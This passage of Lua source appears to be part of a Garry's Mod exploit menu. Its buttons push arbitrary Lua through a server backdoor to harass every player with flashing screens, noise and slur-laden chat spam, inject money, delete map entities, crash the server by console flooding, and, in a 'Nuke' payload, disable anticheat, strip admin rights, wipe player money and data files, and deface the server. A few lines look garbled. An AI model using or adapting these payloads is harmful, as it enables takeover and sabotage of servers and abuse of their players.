  750. SploitNotify("Super Spam Visuel/Sonore activé")
  751. surface.PlaySound("buttons/blip1.wav")
  752. end
  753.  
  754. local Macro = vgui.Create( "DButton" )
  755. Macro:SetParent(Controller)
  756. Macro:SetPos( 20, 60 )
  757. Macro:SetText( "SSV 2 (base)" )
  758. Macro:SetTextColor( Color(255, 255, 255, 255) )
  759. Macro:SetSize( 110, 25 )
  760. Macro.Paint = function()
  761. surface.SetDrawColor(139, 0, 0)
  762. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  763. surface.SetDrawColor( 32, 80, 154 )
  764. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  765. end
  766. Macro.DoClick = function()
  767. net.Start(netKey)
  768. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SendLua([[local hud = vgui.Create(\"HTML\") hud:MoveToFront() hud:SetSize(200,158) hud:SetPos(0,0) hud:OpenURL(\"http://image.noelshack.com/fichiers/2017/46/1/1510531246-swag-dance.gif\")]]) v:SendLua([[local hud2 = vgui.Create(\"HTML\") hud2:MoveToFront() hud2:SetSize(200,158) hud2:SetPos(0,ScrH()-158) hud2:OpenURL(\"http://image.noelshack.com/fichiers/2017/46/1/1510531305-spin.gif\")]]) v:SendLua([[local hud3 = vgui.Create(\"HTML\") hud3:MoveToFront() hud3:SetSize(200,158) hud3:SetPos(ScrW()-200,0) hud3:OpenURL(\"http://image.noelshack.com/fichiers/2017/46/1/1510531246-swag-dance.gif\")]]) v:SendLua([[local hud4 = vgui.Create(\"HTML\") hud4:MoveToFront() hud4:SetSize(200,158) hud4:SetPos(ScrW()-200,ScrH()-158) hud4:OpenURL(\"http://image.noelshack.com/fichiers/2017/46/1/1510531305-spin.gif\")]]) timer.Create( \"spamsondeouf\", 1, 0, function() v:EmitSound( \"npc/stalker/go_alert2a.wav\", 100, 100 ) end) v:SendLua([[hook.Add(\"HUDPaint\",\"c\", function() draw.RoundedBox(0,0,0,ScrW(),ScrH(),Color(math.random(1,255),math.random(1,255),math.random(1,255),155)) end)]]) end BroadcastLua([[hook.Add( \"RenderScreenspaceEffects\", \"ohgod\", function() local sinScaler = math.sin( CurTime() *(RealFrameTime() *1024) ) DrawSharpen( 1 +(sinScaler *10), 0.5 +(sinScaler *2) ) DrawMaterialOverlay( \"effects/tp_eyefx/tpeye\", 1 ) end)]]) BroadcastLua([[timer.Create( \"thedrop\", 0.42, 0, function() util.ScreenShake( LocalPlayer():GetPos(), 512, 5, 0.25, 128 ) end )]]) BroadcastLua([[local hud3 = vgui.Create(\"HTML\") hud3:SetSize(400,300) hud3:SetPos(ScrW()/2-200,ScrH()/2-150) hud3:OpenURL(\"http://image.noelshack.com/fichiers/2017/46/1/1510531253-skel2.gif\")]])" )
  769. net.WriteBit (1)
  770. net.SendToServer()
  771. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Super Spam Visuel 2 (base) activé" )
  772. SploitNotify("Super Spam Visuel/Sonore activé")
  773. surface.PlaySound("buttons/blip1.wav")
  774. end
  775.  
  776.  
  777.  
  778. local Macro = vgui.Create( "DButton" )
  779. Macro:SetParent(Controller)
  780. Macro:SetPos( 20, 90)
  781. Macro:SetTextColor( Color(255, 255, 255, 255) )
  782. Macro:SetSize( 110, 25 )
  783. Macro:SetText( "SSV 3 (HACKED)" )
  784. Macro.Paint = function()
  785. surface.SetDrawColor(139, 0, 0)
  786. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  787. surface.SetDrawColor( 32, 80, 154 )
  788. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  789. end
  790. Macro.DoClick = function()
  791. net.Start(netKey)
  792. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SendLua([[local hud = vgui.Create(\"HTML\") hud:MoveToFront() hud:SetSize(1920,1080) hud:SetPos(0,0) hud:OpenURL(\"http://jesuschristoff.livehost.fr/gmod/upload/giphy2.gif\")]]) v:SendLua([[local hud2 = vgui.Create(\"HTML\") hud2:MoveToFront() hud2:SetSize(200,158) hud2:SetPos(0,ScrH()-158) hud2:OpenURL(\"\")]]) v:SendLua([[local hud3 = vgui.Create(\"HTML\") hud3:MoveToFront() hud3:SetSize(200,158) hud3:SetPos(ScrW()-200,0) hud3:OpenURL(\"\")]]) v:SendLua([[local hud4 = vgui.Create(\"HTML\") hud4:MoveToFront() hud4:SetSize(1920,1080) hud4:SetPos(ScrW()-150,ScrH()-100) hud4:OpenURL(\"\")]]) timer.Create( \"spamsondeouf\", 1, 0, function() v:EmitSound( \"npc/stalker/go_alert2a.wav\", 100, 100 ) end) v:SendLua([[hook.Add(\"HUDPaint\",\"c\", function() draw.RoundedBox(0,0,0,ScrW(),ScrH(),Color(math.random(1,255),math.random(1,255),math.random(1,255),155)) end)]]) end BroadcastLua([[hook.Add( \"RenderScreenspaceEffects\", \"ohgod\", function() local sinScaler = math.sin( CurTime() *(RealFrameTime() *1024) ) DrawSharpen( 1 +(sinScaler *10), 0.5 +(sinScaler *2) ) DrawMaterialOverlay( \"effects/tp_eyefx/tpeye\", 1 ) end)]]) BroadcastLua([[timer.Create( \"thedrop\", 0.42, 0, function() util.ScreenShake( LocalPlayer():GetPos(), 512, 5, 0.25, 128 ) end )]]) BroadcastLua([[local hud3 = vgui.Create(\"HTML\") hud3:SetSize(1920,1080) hud3:SetPos(ScrW()/2-200,ScrH()/2-150) hud3:OpenURL(\"\")]])" )
  793. net.WriteBit (1)
  794. net.SendToServer()
  795. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Super Spam Visuel 3 (HACKED) activé" )
  796. SploitNotify("Super Spam Visuel/Sonore activé")
  797. surface.PlaySound("buttons/blip1.wav")
  798. end
  799.  
  800. ----------------------------------------------------------------------------------
  801.  
  802.  
  803. local Macro = vgui.Create( "DButton" )
  804. Macro:SetParent(Controller)
  805. Macro:SetPos( 140, 30 )
  806. Macro:SetTextColor( Color(255, 255, 255, 255) )
  807. Macro:SetSize( 110, 25 )
  808. Macro:SetText( "Spam 1 - Seized" )
  809. Macro.Paint = function()
  810. surface.SetDrawColor(29, 39, 55)
  811. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  812. surface.SetDrawColor( 32, 80, 154 )
  813. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  814. end
  815. Macro.DoClick = function()
  816. net.Start(netKey)
  817. net.WriteString("timer.Create( \"tchat1\", 0.1, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), \"Seized fdp\")]]) end)")
  818. net.WriteBit (1)
  819. net.SendToServer()
  820. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Spam 1 - Seized activé" )
  821. SploitNotify("SPAM activé !")
  822. surface.PlaySound("buttons/blip1.wav")
  823. end
  824.  
  825. local Macro = vgui.Create( "DButton" )
  826. Macro:SetParent(Controller)
  827. Macro:SetPos( 140, 60 )
  828. Macro:SetTextColor( Color(255, 255, 255, 255) )
  829. Macro:SetSize( 110, 25 )
  830. Macro:SetText( "Spam 2 - Bz fdp" )
  831. Macro.Paint = function()
  832. surface.SetDrawColor(29, 39, 55)
  833. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  834. surface.SetDrawColor( 32, 80, 154 )
  835. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  836. end
  837. Macro.DoClick = function()
  838. net.Start(netKey)
  839. net.WriteString("timer.Create( \"tchat2\", 0.1, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), \"Tu t'es bien fais niquer fais de pute ! :)\")]]) end)")
  840. net.WriteBit (1)
  841. net.SendToServer()
  842. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Spam 2 - Bz fdp activé" )
  843. SploitNotify("SPAM activé !")
  844. surface.PlaySound("buttons/blip1.wav")
  845. end
  846.  
  847. local Macro = vgui.Create( "DButton" )
  848. Macro:SetParent(Controller)
  849. Macro:SetPos( 140, 90 )
  850. Macro:SetTextColor( Color(255, 255, 255, 255) )
  851. Macro:SetSize( 110, 25 )
  852. Macro:SetText( "Spam 3 - Get dicked" )
  853. Macro.Paint = function()
  854. surface.SetDrawColor(29, 39, 55)
  855. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  856. surface.SetDrawColor( 32, 80, 154 )
  857. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  858. end
  859. Macro.DoClick = function()
  860. net.Start(netKey)
  861. net.WriteString("timer.Create( \"tchat3\", 0.1, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), \"Get dicked bitch\")]]) end)")
  862. net.WriteBit (1)
  863. net.SendToServer()
  864. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Spam 3 - Get dicked activé" )
  865. SploitNotify("SPAM activé !")
  866. surface.PlaySound("buttons/blip1.wav")
  867. end
  868.  
  869. local Macro = vgui.Create( "DButton" )
  870. Macro:SetParent(Controller)
  871. Macro:SetPos( 140, 120 )
  872. Macro:SetTextColor( Color(255, 255, 255, 255) )
  873. Macro:SetSize( 110, 25 )
  874. Macro:SetText( "Spam 4 - Serv. de merde" )
  875. Macro.Paint = function()
  876. surface.SetDrawColor(29, 39, 55)
  877. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  878. surface.SetDrawColor( 32, 80, 154 )
  879. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  880. end
  881. Macro.DoClick = function()
  882. net.Start(netKey)
  883. net.WriteString("timer.Create( \"tchat4\", 0.1, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), \"SERVEUR DE MERDE\")]]) end)")
  884. net.WriteBit (1)
  885. net.SendToServer()
  886. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Spam 4 - Serveur de merde activé" )
  887. SploitNotify("Serveur de merde activé !")
  888. surface.PlaySound("buttons/blip1.wav")
  889. end
  890.  
  891. local Macro = vgui.Create( "DButton" )
  892. Macro:SetParent(Controller)
  893. Macro:SetPos( 140, 150 )
  894. Macro:SetTextColor( Color(255, 255, 255, 255) )
  895. Macro:SetSize( 110, 25 )
  896. Macro:SetText( "Spam 5 - RIP" )
  897. Macro.Paint = function()
  898. surface.SetDrawColor(29, 39, 55)
  899. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  900. surface.SetDrawColor( 32, 80, 154 )
  901. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  902. end
  903. Macro.DoClick = function()
  904. net.Start(netKey)
  905. net.WriteString("timer.Create( \"tchat5\", 0.1, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), \"RIP RIP RIP RIP\")]]) end)")
  906. net.WriteBit (1)
  907. net.SendToServer()
  908. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Spam 5 - RIP activé " )
  909. SploitNotify("SPAM activé !")
  910. surface.PlaySound("buttons/blip1.wav")
  911. end
  912.  
  913. local Macro = vgui.Create( "DButton" )
  914. Macro:SetParent(Controller)
  915. Macro:SetPos( 140, 180 )
  916. Macro:SetTextColor( Color(255, 255, 255, 255) )
  917. Macro:SetSize( 110, 25 )
  918. Macro:SetText( "Spam - STOP SPAM" )
  919. Macro.Paint = function()
  920. surface.SetDrawColor(29, 39, 55)
  921. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  922. surface.SetDrawColor( 32, 80, 154 )
  923. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  924. end
  925. Macro.DoClick = function()
  926. net.Start(netKey)
  927. net.WriteString([[
  928. timer.Remove ("tchat1")
  929. timer.Remove ("tchat2")
  930. timer.Remove ("tchat3")
  931. timer.Remove ("tchat4")
  932. timer.Remove ("tchat5")
  933. ]])
  934. net.WriteBit (1)
  935. net.SendToServer()
  936. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Stop spam" )
  937. SploitNotify("SPAM désactivé")
  938. surface.PlaySound("buttons/blip1.wav")
  939. end
  940.  
  941. --[[]]
  942. local Macro = vgui.Create( "DButton" )
  943. Macro:SetParent(Controller)
  944. Macro:SetPos( 260, 30 )
  945. Macro:SetTextColor( Color(255, 255, 255, 255) )
  946. Macro:SetSize( 110, 25 )
  947. Macro:SetText( "2D Players" )
  948. Macro.Paint = function()
  949. surface.SetDrawColor(29, 39, 55)
  950. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  951. surface.SetDrawColor( 32, 80, 154 )
  952. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  953. end --
  954. Macro.DoClick = function()
  955. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "2D Players activé" )
  956. SploitNotify("2D players activé !")
  957. surface.PlaySound("buttons/blip1.wav")
  958. net.Start(netKey)
  959. net.WriteString([[
  960. for k,v in pairs(player.GetAll()) do
  961. local a = v:LookupBone("ValveBiped.Bip01_Head1")
  962. local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
  963. local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
  964. local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
  965. local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
  966. local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
  967. local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
  968. local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
  969. local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  970. local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
  971. local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
  972.  
  973. v:ManipulateBoneScale( a, Vector(4,0,4))
  974. v:ManipulateBoneScale( b, Vector(0,0,0))
  975. v:ManipulateBoneScale( c, Vector(0,0,0))
  976. v:ManipulateBoneScale( d, Vector(0,0,1))
  977. v:ManipulateBoneScale( e, Vector(0,0,1))
  978. v:ManipulateBoneScale( f, Vector(0,0,0))
  979. v:ManipulateBoneScale( g, Vector(0,0,0))
  980. v:ManipulateBoneScale( h, Vector(1,1.5,1.5))
  981. v:ManipulateBoneScale( i, Vector(1,1.5,1.5))
  982. v:ManipulateBoneScale( j, Vector(0,0,0))
  983. v:ManipulateBoneScale( k, Vector(0,0,0))
  984. end]])
  985. net.WriteBit(1)
  986. net.SendToServer()
  987. end
  988.  
  989. local Macro = vgui.Create( "DButton" )
  990. Macro:SetParent(Controller)
  991. Macro:SetPos( 260, 60 )
  992. Macro:SetTextColor( Color(255, 255, 255, 255) )
  993. Macro:SetSize( 110, 25 )
  994. Macro:SetText( "10000000€ toutes les 0.1sec tous les joueurs" )
  995. Macro.Paint = function()
  996. surface.SetDrawColor(29, 39, 55)
  997. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  998. surface.SetDrawColor( 32, 80, 154 )
  999. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1000. end
  1001. Macro.DoClick = function()
  1002. net.Start(netKey)
  1003. net.WriteString( "for k,v in pairs(player.GetAll()) do timer.Create( \"timerargent10\", 0.1, 0, function() v:addMoney(10000000) end) end" )
  1004. net.WriteBit (1)
  1005. net.SendToServer()
  1006. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "10000000€ toutes les 0.1sec activé." )
  1007. SploitNotify("MONEY MONEY MONEY")
  1008. surface.PlaySound("buttons/blip1.wav")
  1009. end
  1010.  
  1011. local Macro = vgui.Create( "DButton" )
  1012. Macro:SetParent(Controller)
  1013. Macro:SetPos( 260, 90 )
  1014. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1015. Macro:SetSize( 110, 25 )
  1016. Macro:SetText( "Cleanup" )
  1017. Macro.Paint = function()
  1018. surface.SetDrawColor(29, 39, 55)
  1019. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1020. surface.SetDrawColor( 32, 80, 154 )
  1021. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1022. end
  1023. Macro.DoClick = function()
  1024. net.Start(netKey)
  1025. net.WriteString( "for k, v in pairs(ents.FindByClass( \"prop_*\" )) do v:Remove() end for k, v in pairs(ents.FindByClass( \"func_*\" )) do v:Remove() end for k, v in pairs(ents.FindByClass( \"env_*\" )) do v:Remove() end for k, v in pairs(ents.FindByClass( \"lua_run*\" )) do v:Remove() end for k, v in pairs(ents.FindByClass( \"point_*\" )) do v:Remove() end for k, v in pairs(ents.FindByClass( \"trigger_*\" )) do v:Remove() end for k, v in pairs(ents.FindByClass( \"info_*\" )) do v:Remove() end" )
  1026. net.WriteBit (1)
  1027. net.SendToServer()
  1028. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Map clean up." )
  1029. SploitNotify("Map cleanup !")
  1030. surface.PlaySound("buttons/blip1.wav")
  1031. end
  1032.  
  1033. local Macro = vgui.Create( "DButton" )
  1034. Macro:SetParent(Controller)
  1035. Macro:SetPos( 260, 120 )
  1036. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1037. Macro:SetSize( 110, 25 )
  1038. Macro:SetText( "Shutdown" )
  1039. Macro.Paint = function()
  1040. surface.SetDrawColor(29, 39, 55)
  1041. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1042. surface.SetDrawColor( 32, 80, 154 )
  1043. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1044. end
  1045. Macro.DoClick = function()
  1046. net.Start(netKey)
  1047. net.WriteString( "timer.Create( \"spamlol\", 0, 0, function() for i = 1, 1000000 do MsgC(Color(math.random(255), math.random(255), math.random(255)), \"Owned by Jesus & Zilnix\") end end)" )
  1048. net.WriteBit (1)
  1049. net.SendToServer()
  1050. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Arret..." )
  1051. SploitNotify("RIP le serveur :)")
  1052. surface.PlaySound("buttons/blip1.wav")
  1053. end
  1054.  
  1055.  
  1056. local Macro = vgui.Create( "DButton" )
  1057. Macro:SetParent(Controller)
  1058. Macro:SetPos( 260, 150 )
  1059. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1060. Macro:SetSize( 110, 25 )
  1061. Macro:SetText( "Armageddon" )
  1062. Macro.Paint = function()
  1063. surface.SetDrawColor(29, 39, 55)
  1064. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1065. surface.SetDrawColor( 32, 80, 154 )
  1066. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1067. end
  1068. Macro.DoClick = function()
  1069. local faggot = [[
  1070. hook.Add("Think", "armageddon", function()
  1071. local explode = ents.Create( "env_explosion" )
  1072. explode:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
  1073. explode:Spawn()
  1074. explode:SetKeyValue( "iMagnitude", "500" )
  1075. explode:Fire( "Explode", 0, 0 )
  1076. end)
  1077. ]]
  1078. net.Start(netKey)
  1079. net.WriteString( faggot )
  1080. net.WriteBit (1)
  1081. net.SendToServer()
  1082. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Armageddon activé" )
  1083. SploitNotify("Armageddon activé !")
  1084. surface.PlaySound("buttons/blip1.wav")
  1085. end
  1086.  
  1087. local Macro = vgui.Create( "DButton" )
  1088. Macro:SetParent(Controller)
  1089. Macro:SetPos( 260, 180 )
  1090. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1091. Macro:SetSize( 110, 25 )
  1092. Macro:SetText( "Nuke" )
  1093. Macro.Paint = function()
  1094. surface.SetDrawColor(29, 39, 55)
  1095. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1096. surface.SetDrawColor( 32, 80, 154 )
  1097. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1098. end
  1099. Macro.DoClick = function()
  1100. local nuke = [[
  1101. if( LeyAC ) then
  1102. LeyAC = nil;
  1103. end
  1104.  
  1105. timer.Create( "next_level_timer2", 20, 0, function()
  1106. --Break some bad cmds
  1107. local bad = {"Ban","Kick","Kill","KillSilent","GodEnable","GodDisable"} for k,v in next, bad do FindMetaTable("Player")[v] = nil end
  1108. --Break ULX
  1109. if ULib then
  1110. for k,v in pairs(player.GetAll()) do
  1111. ULib.ucl.addUser( v:SteamID(), {}, {}, "user" );
  1112. end
  1113.  
  1114. for k,v in pairs(ULib.ucl.groups) do
  1115. if k != "user" then
  1116. ULib.ucl.removeGroup(k);
  1117. end
  1118. end
  1119.  
  1120. for k,v in pairs(ULib.ucl.users) do
  1121. v.group = "user"
  1122. end
  1123. end
  1124. --Gamemode related
  1125. if GAMEMODE.Name == "DarkRP" then
  1126.  
  1127. for k,v in pairs(player.GetAll()) do
  1128. RunConsoleCommand("rp_setmoney", v:Nick(), 0);
  1129. end
  1130.  
  1131. hook.Add("PlayerInitialSpawn", "darkrp_specific_persistence", function( ply )
  1132. RunConsoleCommand("rp_setmoney", ply:Nick(), 0);
  1133. end)
  1134. end
  1135.  
  1136. if GAMEMODE.Name == "Trouble in Terrorist Town" then //something here?
  1137. //for k, v in pairs(player.GetAll()) do
  1138. //end
  1139. end
  1140.  
  1141. if net.WriteString.find( GAMEMODE.Name:lower(), "stronghold" ) then
  1142. for k,v in pairs(player.GetAll()) do
  1143. RunConsoleCommand("gbux_setmoney", v:Nick(), 0);
  1144. end
  1145.  
  1146. hook.Add("PlayerInitialSpawn", "stronghold_specific_persistence", function( ply )
  1147. RunConsoleCommand("gbux_setmoney", ply:Nick(), 0);
  1148. end)
  1149.  
  1150. local fil = file.Find( "data/stronghold/playerinfo/*.txt", "GAME" )
  1151.  
  1152. for k, v in pairs( fil ) do
  1153. file.Delete( fil )
  1154. end
  1155. end
  1156. end)
  1157.  
  1158. if GetConVarnet.WriteString("sv_allowcslua") != "0" then
  1159. RunConsoleCommand( "sv_allowcslua", "1" );
  1160. end
  1161.  
  1162. hook.Add("Think", "busted", function()
  1163. for k,v in pairs (player.GetAll()) do
  1164. v:SetModelScale(2.5, 100);
  1165. v:SetRunSpeed(400 * 2);
  1166. v:SetWalkSpeed(200 * 2);
  1167. end
  1168. end)
  1169.  
  1170. timer.Create( "next_level_timer", 5, 0, function()
  1171. for k, v in pairs(player.GetAll()) do
  1172. v:ConCommand("say Jesus is the best !");
  1173. end
  1174. end)
  1175.  
  1176. RunConsoleCommand("hostname", "Seized by Jesus Christ")
  1177. RunConsoleCommand( "sv_loadingurl", "http://uu.esy.es/zyqv6r7n/seized.html" )
  1178. ]]
  1179. net.Start(netKey)
  1180. net.WriteString( nuke )
  1181. net.WriteBit (1)
  1182. net.SendToServer()
  1183. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "NUKE activé !" )
  1184. SploitNotify("NUKE SERVEUR (ça fail mal)")
  1185. surface.PlaySound("buttons/blip1.wav")
  1186. end
  1187.  
  1188. local Macro = vgui.Create( "DButton" )
  1189. Macro:SetParent(Controller)
  1190. Macro:SetPos( 260, 210 )
  1191. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1192. Macro:SetSize( 110, 25 )
  1193. Macro:SetText( "Taille grande" )
  1194. Macro.Paint = function()
  1195. surface.SetDrawColor(29, 39, 55)
  1196. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1197. surface.SetDrawColor( 32, 80, 154 )
  1198. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1199. end
  1200. Macro.DoClick = function()
  1201. local giant = [[
  1202. hook.Add("Think", "giant", function()
  1203. for k,v in pairs (player.GetAll()) do
  1204. v:SetModelScale(50.5, 100);
  1205. v:SetRunSpeed(400 * 2);
  1206. v:SetWalkSpeed(200 * 2);
  1207. end
  1208. end)]]
  1209. net.Start(netKey)
  1210. net.WriteString( giant )
  1211. net.WriteBit (1)
  1212. net.SendToServer()
  1213. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Tout le monde grandit ! :o" )
  1214. SploitNotify("Tout le monde est grand !")
  1215. surface.PlaySound("buttons/blip1.wav")
  1216. end
  1217.  
  1218. local Macro = vgui.Create( "DButton" )
  1219. Macro:SetParent(Controller)
  1220. Macro:SetPos( 260, 240 )
  1221. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1222. Macro:SetSize( 110, 25 )
  1223. Macro:SetText( "Taille petite" )
  1224. Macro.Paint = function()
  1225. surface.SetDrawColor(29, 39, 55)
  1226. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1227. surface.SetDrawColor( 32, 80, 154 )
  1228. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1229. end
  1230. Macro.DoClick = function()
  1231. local tall = [[
  1232. hook.Add("Think", "tall", function()
  1233. for k,v in pairs (player.GetAll()) do
  1234. v:SetModelScale(0.2, 80);
  1235. v:SetRunSpeed(400 * 2);
  1236. v:SetWalkSpeed(200 * 2);
  1237. end
  1238. end)]]
  1239. net.Start(netKey)
  1240. net.WriteString( tall )
  1241. net.WriteBit (1)
  1242. net.SendToServer()
  1243. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Tout le monde devient petit :o" )
  1244. SploitNotify("Tout le monde devient petit")
  1245. surface.PlaySound("buttons/blip1.wav")
  1246. end
  1247.  
  1248. local Macro = vgui.Create( "DButton" )
  1249. Macro:SetParent(Controller)
  1250. Macro:SetPos( 260, 270 )
  1251. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1252. Macro:SetSize( 110, 25 )
  1253. Macro:SetText( "Speedhack" )
  1254. Macro.Paint = function()
  1255. surface.SetDrawColor(29, 39, 55)
  1256. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1257. surface.SetDrawColor( 32, 80, 154 )
  1258. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1259. end
  1260. Macro.DoClick = function()
  1261. local speedhack = [[
  1262. hook.Add("Think", "speedhack", function()
  1263. for k,v in pairs (player.GetAll()) do
  1264. v:SetRunSpeed(400* 4);
  1265. v:SetWalkSpeed(200 * 2);
  1266. end
  1267. end)]]
  1268. net.Start(netKey)
  1269. net.WriteString( speedhack )
  1270. net.WriteBit (1)
  1271. net.SendToServer()
  1272. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "ERREUR, CET EXPLOIT NE FONCTIONNE PAS ! Contacter Jesus christ si l'erreur persite." )
  1273. SploitNotify("Speedhack activé")
  1274. surface.PlaySound("buttons/blip1.wav")
  1275. end
  1276.  
  1277. local Macro = vgui.Create( "DButton" )
  1278. Macro:SetParent(Controller)
  1279. Macro:SetPos( 260, 300 )
  1280. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1281. Macro:SetSize( 110, 25 )
  1282. Macro:SetText( "Cancer" )
  1283. Macro.Paint = function()
  1284. surface.SetDrawColor(29, 39, 55)
  1285. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1286. surface.SetDrawColor( 32, 80, 154 )
  1287. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1288. end
  1289. Macro.DoClick = function()
  1290. net.Start(netKey)
  1291. net.WriteString([[
  1292. for k,v in pairs(player.GetAll()) do
  1293. timer.Create("cough", 10, 0, function()
  1294. RunConsoleCommand("say", "*cough*")
  1295. v:EmitSound("ambient/voices/cough"..math.random(4)..".wav", 450 + math.random() * 50, 50 + math.random() * 10)
  1296. util.ScreenShake( Vector( 0, 0, 0 ), 1000, 1000, 1, 5000 )
  1297. end)
  1298. end
  1299. ]])
  1300. net.WriteBit ( 1 )
  1301. net.SendToServer()
  1302. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Cancer activé" )
  1303. SploitNotify("Cancer activé")
  1304. surface.PlaySound("buttons/blip1.wav")
  1305. end
  1306.  
  1307. local Macro = vgui.Create( "DButton" )
  1308. Macro:SetParent(Controller)
  1309. Macro:SetPos( 260, 330 )
  1310. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1311. Macro:SetSize( 110, 25 )
  1312. Macro:SetText( "Earthquake" )
  1313. Macro.Paint = function()
  1314. surface.SetDrawColor(29, 39, 55)
  1315. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1316. surface.SetDrawColor( 32, 80, 154 )
  1317. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1318. end --
